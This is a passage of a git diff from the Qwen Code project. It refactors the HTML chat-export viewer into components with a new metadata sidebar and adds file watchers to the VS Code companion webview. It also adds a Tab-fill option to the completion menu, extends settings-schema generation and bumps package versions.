try { - const reason = ( - (message.data as { reason?: string } | undefined)?.reason || '' - ).toLowerCase(); + const reason = (endData?.reason || '').toLowerCase(); /** * Handle different types of stream end reasons that require a full reset: diff --git a/packages/vscode-ide-companion/src/webview/providers/MessageHandler.ts b/packages/vscode-ide-companion/src/webview/providers/MessageHandler.ts index a06fd1a3b..d400fa727 100644 --- a/packages/vscode-ide-companion/src/webview/providers/MessageHandler.ts +++ b/packages/vscode-ide-companion/src/webview/providers/MessageHandler.ts @@ -4,6 +4,7 @@ * SPDX-License-Identifier: Apache-2.0 */ +import type * as vscode from 'vscode'; import type { QwenAgentManager } from '../../services/qwenAgentManager.js'; import type { ConversationStore } from '../../services/conversationStore.js'; import type { @@ -86,4 +87,8 @@ export class MessageHandler { appendStreamContent(chunk: string): void { this.router.appendStreamContent(chunk); } + + setupFileWatchers(): vscode.Disposable { + return this.router.setupFileWatchers(); + } } diff --git a/packages/vscode-ide-companion/src/webview/providers/WebViewProvider.ts b/packages/vscode-ide-companion/src/webview/providers/WebViewProvider.ts index e8e5e3f74..c54fa4af4 100644 --- a/packages/vscode-ide-companion/src/webview/providers/WebViewProvider.ts +++ b/packages/vscode-ide-companion/src/webview/providers/WebViewProvider.ts @@ -89,6 +89,10 @@ export class WebViewProvider { await this.forceReLogin(); }); + // Setup file watchers for cache invalidation + const fileWatcherDisposable = this.messageHandler.setupFileWatchers(); + this.disposables.push(fileWatcherDisposable); + // Setup agent callbacks this.agentManager.onMessage((message) => { // Do not suppress messages during checkpoint saves. 
diff --git a/packages/web-templates/package.json b/packages/web-templates/package.json index 066a3359e..fbedb34d0 100644 --- a/packages/web-templates/package.json +++ b/packages/web-templates/package.json @@ -1,6 +1,6 @@ { "name": "@qwen-code/web-templates", - "version": "0.12.3", + "version": "0.13.0", "description": "Web templates bundled as embeddable JS/CSS strings", "repository": { "type": "git", diff --git a/packages/web-templates/src/export-html/src/components/CopyButton.tsx b/packages/web-templates/src/export-html/src/components/CopyButton.tsx new file mode 100644 index 000000000..4a390d50b --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/CopyButton.tsx @@ -0,0 +1,53 @@ +const React = window.React; + +export type CopyButtonProps = { + text: string; +}; + +export const CopyButton = ({ text }: CopyButtonProps) => { + const [copied, setCopied] = React.useState(false); + + const handleCopy = async () => { + try { + await navigator.clipboard.writeText(text); + setCopied(true); + setTimeout(() => setCopied(false), 2000); + } catch (err) { + console.error('Failed to copy:', err); + } + }; + + return ( + + ); +}; diff --git a/packages/web-templates/src/export-html/src/components/MetadataItem.tsx b/packages/web-templates/src/export-html/src/components/MetadataItem.tsx new file mode 100644 index 000000000..476ab7fe3 --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/MetadataItem.tsx @@ -0,0 +1,28 @@ +export type MetadataItemProps = { + label: string; + value?: string | number; + valueClass?: string; +}; + +export const MetadataItem = ({ + label, + value, + valueClass, +}: MetadataItemProps) => { + if (value === undefined || value === null || value === '') { + return null; + } + return ( +
+
+ {label} + + {value} + +
+
+ ); +}; diff --git a/packages/web-templates/src/export-html/src/components/MetadataSidebar.tsx b/packages/web-templates/src/export-html/src/components/MetadataSidebar.tsx new file mode 100644 index 000000000..ae5c5bd0c --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/MetadataSidebar.tsx @@ -0,0 +1,95 @@ +import type { ExportMetadata } from './types.js'; +import { MetadataItem } from './MetadataItem.js'; +import { + formatRelativeTime, + formatExportTime, + formatTokenLimit, +} from './utils.js'; + +export type MetadataSidebarProps = { + metadata: ExportMetadata; +}; + +export const MetadataSidebar = ({ metadata }: MetadataSidebarProps) => ( + +); diff --git a/packages/web-templates/src/export-html/src/components/hooks.ts b/packages/web-templates/src/export-html/src/components/hooks.ts new file mode 100644 index 000000000..f4dcd7be0 --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/hooks.ts @@ -0,0 +1,38 @@ +import type { PlatformContextValue } from './types.js'; +import { useModalState } from './TempFileModal.js'; + +const React = window.React; + +/** + * Hook to provide platform context for the export HTML viewer + */ +export const usePlatformContext = () => { + const { modalState, openModal, closeModal } = useModalState(); + + const platformContext = React.useMemo( + () => + ({ + platform: 'web' as PlatformContextValue['platform'], + postMessage: (message: unknown) => { + console.log('Posted message:', message); + }, + onMessage: (handler: (event: MessageEvent) => void) => { + window.addEventListener('message', handler); + return () => window.removeEventListener('message', handler); + }, + openFile: (path: string) => { + console.log('Opening file:', path); + }, + openTempFile: openModal, + getResourceUrl: () => undefined, + features: { + canOpenFile: false, + canOpenTempFile: true, + canCopy: true, + }, + }) satisfies PlatformContextValue, + [openModal], + ); + + return { platformContext, modalState, closeModal }; 
+}; diff --git a/packages/web-templates/src/export-html/src/components/types.ts b/packages/web-templates/src/export-html/src/components/types.ts new file mode 100644 index 000000000..3fb562ad3 --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/types.ts @@ -0,0 +1,46 @@ +/** + * Type definitions for export-html + */ + +export type ChatData = { + messages?: unknown[]; + sessionId?: string; + startTime?: string; + metadata?: ExportMetadata; +}; + +export type ExportMetadata = { + sessionId: string; + startTime: string; + exportTime: string; + cwd: string; + gitRepo?: string; + gitBranch?: string; + model?: string; + channel?: string; + promptCount: number; + contextUsagePercent?: number; + contextWindowSize?: number; + totalTokens?: number; + filesRead?: number; + filesWritten?: number; + linesAdded?: number; + linesRemoved?: number; + uniqueFiles: string[]; +}; + +export type PlatformContextValue = { + platform: 'web'; + postMessage: (message: unknown) => void; + onMessage: (handler: (event: MessageEvent) => void) => () => void; + openFile: (path: string) => void; + openTempFile?: (content: string, fileName?: string) => void; + getResourceUrl: () => string | undefined; + features: { + canOpenFile: boolean; + canOpenTempFile?: boolean; + canCopy: boolean; + }; +}; + +export type ChatViewerMessage = { type?: string } & Record; diff --git a/packages/web-templates/src/export-html/src/components/utils.ts b/packages/web-templates/src/export-html/src/components/utils.ts new file mode 100644 index 000000000..6aafc8acf --- /dev/null +++ b/packages/web-templates/src/export-html/src/components/utils.ts @@ -0,0 +1,140 @@ +import type { ChatData, ChatViewerMessage } from './types.js'; + +/** + * Type guard for ChatViewerMessage + */ +export const isChatViewerMessage = ( + value: unknown, +): value is ChatViewerMessage => Boolean(value) && typeof value === 'object'; + +/** + * Parse chat data from the embedded script tag + */ +export const parseChatData = 
(): ChatData => { + const chatDataElement = document.getElementById('chat-data'); + if (!chatDataElement?.textContent) { + return {}; + } + + try { + const parsed = JSON.parse(chatDataElement.textContent) as unknown; + if (parsed && typeof parsed === 'object') { + return parsed as ChatData; + } + return {}; + } catch (error) { + console.error('Failed to parse chat data.', error); + return {}; + } +}; + +/** + * Format session date for display + */ +export const formatSessionDate = (startTime?: string | null) => { + if (!startTime) { + return '-'; + } + + try { + const date = new Date(startTime); + return date.toLocaleString('en-US', { + year: 'numeric', + month: 'short', + day: 'numeric', + hour: '2-digit', + minute: '2-digit', + }); + } catch { + return startTime; + } +}; + +/** + * Format export time for display + */ +export const formatExportTime = (exportTime?: string | null) => { + if (!exportTime) { + return '-'; + } + + try { + const date = new Date(exportTime); + return date.toLocaleString('en-US', { + year: 'numeric', + month: 'short', + day: 'numeric', + hour: '2-digit', + minute: '2-digit', + }); + } catch { + return exportTime; + } +}; + +/** + * Format relative time (e.g., "5 minutes ago") + */ +export const formatRelativeTime = (startTime?: string | null) => { + if (!startTime) { + return '-'; + } + + try { + const date = new Date(startTime); + const startTimestamp = date.getTime(); + if (Number.isNaN(startTimestamp)) { + return '-'; + } + const now = new Date(); + const diffMs = Math.max(0, now.getTime() - startTimestamp); + const diffSeconds = Math.floor(diffMs / 1000); + const diffMinutes = Math.floor(diffSeconds / 60); + const diffHours = Math.floor(diffMinutes / 60); + const diffDays = Math.floor(diffHours / 24); + const diffWeeks = Math.floor(diffDays / 7); + const diffMonths = Math.floor(diffDays / 30); + const diffYears = Math.floor(diffDays / 365); + + if (diffSeconds < 60) { + return 'just now'; + } else if (diffMinutes < 60) { + return 
`${diffMinutes} minute${diffMinutes === 1 ? '' : 's'} ago`; + } else if (diffHours < 24) { + return `${diffHours} hour${diffHours === 1 ? '' : 's'} ago`; + } else if (diffDays < 7) { + return `${diffDays} day${diffDays === 1 ? '' : 's'} ago`; + } else if (diffWeeks < 4) { + return `${diffWeeks} week${diffWeeks === 1 ? '' : 's'} ago`; + } else if (diffMonths < 12) { + return `${diffMonths} month${diffMonths === 1 ? '' : 's'} ago`; + } else { + return `${diffYears} year${diffYears === 1 ? '' : 's'} ago`; + } + } catch { + return '-'; + } +}; + +/** + * Format path with truncation + */ +export const formatPath = (path: string, maxLength: number = 40) => { + if (!path || path.length <= maxLength) return path; + return '...' + path.slice(-maxLength + 3); +}; + +/** + * Format token limit for display (e.g., 128k, 200k, 1m) + * Returns undefined if tokens is not provided. + */ +export const formatTokenLimit = (tokens?: number): string | undefined => { + if (tokens === undefined || tokens === null) return undefined; + if (tokens >= 1000000) { + return `${(tokens / 1000000).toFixed(tokens % 1000000 === 0 ? 0 : 1)}m`; + } + if (tokens >= 1000) { + return `${(tokens / 1000).toFixed(tokens % 1000 === 0 ? 
0 : 1)}k`; + } + return tokens.toString(); +}; diff --git a/packages/web-templates/src/export-html/src/main.tsx b/packages/web-templates/src/export-html/src/main.tsx index a0d7468ba..8c7c19115 100644 --- a/packages/web-templates/src/export-html/src/main.tsx +++ b/packages/web-templates/src/export-html/src/main.tsx @@ -1,6 +1,9 @@ import './styles.css'; import logoSvg from './favicon.svg'; -import { TempFileModal, useModalState } from './components/TempFileModal'; +import { TempFileModal } from './components/TempFileModal.js'; +import { usePlatformContext } from './components/hooks.js'; +import { MetadataSidebar } from './components/MetadataSidebar.js'; +import { parseChatData, isChatViewerMessage } from './components/utils.js'; declare global { interface Window { @@ -10,6 +13,7 @@ declare global { } const ReactDOM = window.ReactDOM; +const React = window.React; declare const QwenCodeWebUI: { ChatViewer: (props: { @@ -25,27 +29,6 @@ declare const QwenCodeWebUI: { const { ChatViewer, PlatformProvider } = QwenCodeWebUI; -type ChatData = { - messages?: unknown[]; - sessionId?: string; - startTime?: string; -}; - -type PlatformContextValue = { - platform: 'web'; - postMessage: (message: unknown) => void; - onMessage: (handler: (event: MessageEvent) => void) => () => void; - openFile: (path: string) => void; - openTempFile?: (content: string, fileName?: string) => void; - getResourceUrl: () => string | undefined; - features: { - canOpenFile: boolean; - canOpenTempFile?: boolean; - canCopy: boolean; - }; -}; -type ChatViewerMessage = { type?: string } & Record; - const logoSvgWithGradient = (() => { if (!logoSvg) { return logoSvg; @@ -59,87 +42,13 @@ const logoSvgWithGradient = (() => { return withDefs.replace(/fill="[^"]*"/, 'fill="url(#qwen-logo-gradient)"'); })(); -const React = window.React; - -const usePlatformContext = () => { - const { modalState, openModal, closeModal } = useModalState(); - - const platformContext = React.useMemo( - () => - ({ - platform: 'web' as 
PlatformContextValue['platform'], - postMessage: (message: unknown) => { - console.log('Posted message:', message); - }, - onMessage: (handler: (event: MessageEvent) => void) => { - window.addEventListener('message', handler); - return () => window.removeEventListener('message', handler); - }, - openFile: (path: string) => { - console.log('Opening file:', path); - }, - openTempFile: openModal, - getResourceUrl: () => undefined, - features: { - canOpenFile: false, - canOpenTempFile: true, - canCopy: true, - }, - }) satisfies PlatformContextValue, - [openModal], - ); - - return { platformContext, modalState, closeModal }; -}; - -const isChatViewerMessage = (value: unknown): value is ChatViewerMessage => - Boolean(value) && typeof value === 'object'; - -const parseChatData = (): ChatData => { - const chatDataElement = document.getElementById('chat-data'); - if (!chatDataElement?.textContent) { - return {}; - } - - try { - const parsed = JSON.parse(chatDataElement.textContent) as unknown; - if (parsed && typeof parsed === 'object') { - return parsed as ChatData; - } - return {}; - } catch (error) { - console.error('Failed to parse chat data.', error); - return {}; - } -}; - -const formatSessionDate = (startTime?: string | null) => { - if (!startTime) { - return '-'; - } - - try { - const date = new Date(startTime); - return date.toLocaleString(undefined, { - year: 'numeric', - month: 'short', - day: 'numeric', - hour: '2-digit', - minute: '2-digit', - }); - } catch { - return startTime; - } -}; - const App = () => { const chatData = parseChatData(); const rawMessages = Array.isArray(chatData.messages) ? chatData.messages : []; const messages = rawMessages .filter(isChatViewerMessage) .filter((record) => record.type !== 'system'); - const sessionId = chatData.sessionId ?? 
'-'; - const sessionDate = formatSessionDate(chatData.startTime); + const metadata = chatData.metadata; const { platformContext, modalState, closeModal } = usePlatformContext(); return ( @@ -157,21 +66,14 @@ const App = () => { -
-
- Session Id - {sessionId} -
-
- Export Time - {sessionDate} -
-
-
- - - +
+
+ + + +
+ {metadata && }
diff --git a/packages/web-templates/src/export-html/src/styles.css b/packages/web-templates/src/export-html/src/styles.css index e8286b2c5..df0f157e6 100644 --- a/packages/web-templates/src/export-html/src/styles.css +++ b/packages/web-templates/src/export-html/src/styles.css @@ -144,14 +144,6 @@ body { color: #71717a; } -.chat-container { - width: 100%; - max-width: 900px; - padding: 40px 20px; - box-sizing: border-box; - flex: 1; -} - ::-webkit-scrollbar { width: 10px; height: 10px; @@ -201,3 +193,192 @@ body { padding: 16px 12px; } } + +/* Main layout - sidebar on right, messages on left */ +.content-wrapper { + display: flex; + width: 100%; + max-width: 1600px; + height: calc(100vh - 73px); +} + +.chat-container { + flex: 1; + min-width: 0; + overflow-y: auto; + padding: 24px; + box-sizing: border-box; +} + +/* Metadata Sidebar - fixed on right */ +.metadata-sidebar { + width: 320px; + min-width: 320px; + padding: 12px; + border-right: 1px solid var(--border-color); + background-color: var(--bg-secondary); + display: flex; + flex-direction: column; + gap: 12px; + overflow-y: auto; + height: 100%; + box-sizing: border-box; +} + +.metadata-section { + display: flex; + flex-direction: column; + gap: 8px; +} + +.metadata-section-title { + font-size: 10px; + font-weight: 600; + color: var(--text-secondary); + text-transform: uppercase; + letter-spacing: 0.05em; + margin: 0; + padding-bottom: 4px; + border-bottom: 1px solid var(--border-color); +} + +.metadata-section-small { + margin-top: auto; + padding-top: 12px; + border-top: 1px solid var(--border-color); +} + +.metadata-item { + display: flex; + flex-direction: column; + gap: 2px; +} + +.metadata-item-empty { + font-size: 12px; + color: #71717a; + margin: 0; + padding: 4px 0; +} + +.metadata-content { + display: flex; + flex-direction: column; + gap: 2px; + min-width: 0; +} + +.metadata-content .metadata-label { + font-size: 10px; + color: #71717a; +} + +.metadata-content .metadata-value { + font-size: 12px; + 
color: var(--text-primary); + word-break: break-all; + line-height: 1.3; + cursor: pointer; +} + +.metadata-content .metadata-value.multiline { + white-space: pre-wrap; +} + +.metadata-content .metadata-value.text-green { + color: #22c55e; +} + +.metadata-content .metadata-value.text-red { + color: #ef4444; +} + +.metadata-value-with-copy { + display: flex; + align-items: center; + gap: 8px; +} + +.metadata-value-with-copy .metadata-value { + flex: 1; + min-width: 0; +} + +.copy-button { + display: inline-flex; + align-items: center; + justify-content: center; + padding: 4px; + background: transparent; + border: 1px solid var(--border-color, #3f3f46); + border-radius: 4px; + color: var(--text-secondary, #a1a1aa); + cursor: pointer; + transition: all 0.15s ease; + flex-shrink: 0; +} + +.copy-button:hover { + background: var(--bg-hover, #27272a); + color: var(--text-primary, #f4f4f5); + border-color: var(--border-hover, #52525b); +} + +.copy-button:active { + transform: scale(0.95); +} + +/* Responsive adjustments */ +@media (max-width: 1024px) { + .metadata-sidebar { + width: 320px; + min-width: 320px; + padding: 10px; + } +} + +@media (max-width: 768px) { + .content-wrapper { + flex-direction: column; + height: auto; + } + + .chat-container { + height: auto; + min-height: 50vh; + } + + .metadata-sidebar { + width: 100%; + min-width: 100%; + height: auto; + max-height: none; + border-right: none; + border-top: 1px solid var(--border-color); + padding: 12px; + gap: 12px; + } + + .metadata-section { + flex-direction: row; + flex-wrap: wrap; + gap: 12px; + } + + .metadata-section-title { + width: 100%; + border-bottom: none; + padding-bottom: 0; + } + + .metadata-item { + flex: 1; + min-width: 140px; + } + + .metadata-section-small { + margin-top: 0; + padding-top: 0; + border-top: none; + } +} diff --git a/packages/webui/package.json b/packages/webui/package.json index 46e2e26dc..da5a463ab 100644 --- a/packages/webui/package.json +++ b/packages/webui/package.json @@ 
-1,6 +1,6 @@ { "name": "@qwen-code/webui", - "version": "0.12.3", + "version": "0.13.0", "description": "Shared UI components for Qwen Code packages", "type": "module", "main": "./dist/index.cjs", diff --git a/packages/webui/src/components/layout/CompletionMenu.tsx b/packages/webui/src/components/layout/CompletionMenu.tsx index 06727f7ee..eeefd6da7 100644 --- a/packages/webui/src/components/layout/CompletionMenu.tsx +++ b/packages/webui/src/components/layout/CompletionMenu.tsx @@ -17,8 +17,10 @@ import type { CompletionItem } from '../../types/completion.js'; export interface CompletionMenuProps { /** List of completion items to display */ items: CompletionItem[]; - /** Callback when an item is selected */ + /** Callback when an item is selected (Enter / click) */ onSelect: (item: CompletionItem) => void; + /** Optional callback for Tab selection (fill without executing). Falls back to onSelect. */ + onFill?: (item: CompletionItem) => void; /** Callback when menu should close */ onClose: () => void; /** Optional section title */ @@ -75,6 +77,7 @@ const groupItems = ( export const CompletionMenu: FC = ({ items, onSelect, + onFill, onClose, title, selectedIndex = 0, @@ -123,12 +126,17 @@ export const CompletionMenu: FC = ({ setSelected((prev) => Math.max(prev - 1, 0)); break; case 'Enter': - case 'Tab': event.preventDefault(); if (items[selected]) { onSelect(items[selected]); } break; + case 'Tab': + event.preventDefault(); + if (items[selected]) { + (onFill ?? 
onSelect)(items[selected]); + } + break; case 'Escape': event.preventDefault(); onClose(); @@ -144,7 +152,7 @@ export const CompletionMenu: FC = ({ document.removeEventListener('mousedown', handleClickOutside); document.removeEventListener('keydown', handleKeyDown); }; - }, [items, selected, onSelect, onClose]); + }, [items, selected, onSelect, onFill, onClose]); useEffect(() => { // Only scroll into view for keyboard navigation, not mouse hover diff --git a/packages/webui/src/components/layout/InputForm.tsx b/packages/webui/src/components/layout/InputForm.tsx index e77f57e24..7edfac03b 100644 --- a/packages/webui/src/components/layout/InputForm.tsx +++ b/packages/webui/src/components/layout/InputForm.tsx @@ -111,8 +111,10 @@ export interface InputFormProps { completionIsOpen: boolean; /** Completion items */ completionItems?: CompletionItem[]; - /** Completion select callback */ + /** Completion select callback (Enter / click) */ onCompletionSelect?: (item: CompletionItem) => void; + /** Completion fill callback (Tab — fill without executing). Falls back to onCompletionSelect. 
*/ + onCompletionFill?: (item: CompletionItem) => void; /** Completion close callback */ onCompletionClose?: () => void; /** Placeholder text */ @@ -170,6 +172,7 @@ export const InputForm: FC = ({ completionIsOpen, completionItems, onCompletionSelect, + onCompletionFill, onCompletionClose, placeholder = 'Ask Qwen Code …', }) => { @@ -242,6 +245,7 @@ export const InputForm: FC = ({ diff --git a/packages/webui/src/components/messages/MarkdownRenderer/MarkdownRenderer.css b/packages/webui/src/components/messages/MarkdownRenderer/MarkdownRenderer.css index c53725e49..45f16499c 100644 --- a/packages/webui/src/components/messages/MarkdownRenderer/MarkdownRenderer.css +++ b/packages/webui/src/components/messages/MarkdownRenderer/MarkdownRenderer.css @@ -182,14 +182,9 @@ monospace ); font-size: 0.95em; - color: var(--app-link-foreground, #007acc); - text-decoration: underline; + color: inherit; + text-decoration: none; cursor: pointer; - transition: color 0.1s ease; -} - -.markdown-content .file-path-link:hover { - color: var(--app-link-active-foreground, #005a9e); } .markdown-content hr { diff --git a/scripts/generate-settings-schema.ts b/scripts/generate-settings-schema.ts index 9d13e8166..903131219 100644 --- a/scripts/generate-settings-schema.ts +++ b/scripts/generate-settings-schema.ts @@ -21,6 +21,7 @@ import { fileURLToPath } from 'node:url'; import type { SettingDefinition, + SettingItemDefinition, SettingsSchema, } from '../packages/cli/src/config/settingsSchema.js'; import { getSettingsSchema } from '../packages/cli/src/config/settingsSchema.js'; @@ -37,6 +38,57 @@ interface JsonSchemaProperty { enum?: (string | number)[]; default?: unknown; additionalProperties?: boolean | JsonSchemaProperty; + required?: string[]; +} + +function convertItemDefinitionToJsonSchema( + itemDef: SettingItemDefinition, +): JsonSchemaProperty { + const schema: JsonSchemaProperty = {}; + + if (itemDef.description) { + schema.description = itemDef.description; + } + + schema.type = 
itemDef.type; + + if (itemDef.enum) { + schema.enum = itemDef.enum; + } + + if (itemDef.type === 'object' && itemDef.properties) { + schema.properties = {}; + const requiredFields: string[] = []; + + for (const [key, childDef] of Object.entries(itemDef.properties)) { + const childSchema = convertItemDefinitionToJsonSchema(childDef); + schema.properties[key] = childSchema; + if (childDef.required) { + requiredFields.push(key); + } + } + + if (requiredFields.length > 0) { + schema.required = requiredFields; + } + } + + if (itemDef.type === 'object' && itemDef.additionalProperties !== undefined) { + if (typeof itemDef.additionalProperties === 'boolean') { + schema.additionalProperties = itemDef.additionalProperties; + } else { + schema.additionalProperties = convertItemDefinitionToJsonSchema( + itemDef.additionalProperties, + ); + } + } + + if (itemDef.items) { + schema.type = 'array'; + schema.items = convertItemDefinitionToJsonSchema(itemDef.items); + } + + return schema; } function convertSettingToJsonSchema( @@ -60,7 +112,11 @@ function convertSettingToJsonSchema( break; case 'array': schema.type = 'array'; - schema.items = { type: 'string' }; + if (setting.items) { + schema.items = convertItemDefinitionToJsonSchema(setting.items); + } else { + schema.items = { type: 'string' }; + } break; case 'enum': if (setting.options && setting.options.length > 0) { diff --git a/scripts/prepare-package.js b/scripts/prepare-package.js index 3ae9d3e08..497fdaff9 100644 --- a/scripts/prepare-package.js +++ b/scripts/prepare-package.js @@ -13,7 +13,6 @@ import fs from 'node:fs'; import path from 'node:path'; import { fileURLToPath } from 'node:url'; -import { execSync } from 'node:child_process'; const __filename = fileURLToPath(import.meta.url); const __dirname = path.dirname(__filename); @@ -179,4 +178,17 @@ fs.writeFileSync( console.log('\n✅ Package prepared for publishing at dist/'); console.log('\nPackage structure:'); -execSync('ls -lh dist/', { stdio: 'inherit', cwd: 
rootDir }); +// Use Node.js to list directory contents (cross-platform) +const distFiles = fs.readdirSync(distDir); +for (const file of distFiles) { + const filePath = path.join(distDir, file); + const stats = fs.statSync(filePath); + const size = stats.isDirectory() ? '' : formatBytes(stats.size); + console.log(` ${size.padEnd(12)} ${file}`); +} + +function formatBytes(bytes) { + if (bytes < 1024) return `${bytes}B`; + if (bytes < 1024 * 1024) return `${(bytes / 1024).toFixed(1)}KB`; + return `${(bytes / (1024 * 1024)).toFixed(1)}MB`; +}